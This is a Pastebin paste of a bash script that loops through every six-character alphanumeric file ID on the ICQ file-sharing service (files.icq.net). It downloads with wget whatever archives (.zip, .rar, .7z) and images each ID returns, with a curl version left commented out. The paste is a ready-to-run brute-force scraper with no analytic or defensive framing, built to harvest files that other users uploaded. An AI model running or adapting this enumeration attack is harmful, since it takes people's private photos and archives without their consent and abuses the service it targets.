Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- baseURL="http://files.icq.net/files/get?fileId="
- for i in {A..Z} {0..9}; do
- for j in {A..Z} {0..9}; do
- for k in {A..Z} {0..9}; do
- for l in {A..Z} {0..9}; do
- for m in {A..Z} {0..9}; do
- for n in {A..Z} {0..9}; do
- fileID="$i$j$k$l$m$n"
- echo $fileID
- #curl -Of#L "$baseURL$fileID"
- wget -qc -t 2 -T 5 -A ".zip,.rar,.7z,.jpg,.jpeg,.bmp,.png,.gif" "$baseURL$fileID"
- done
- done
- done
- done
- done
- done
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement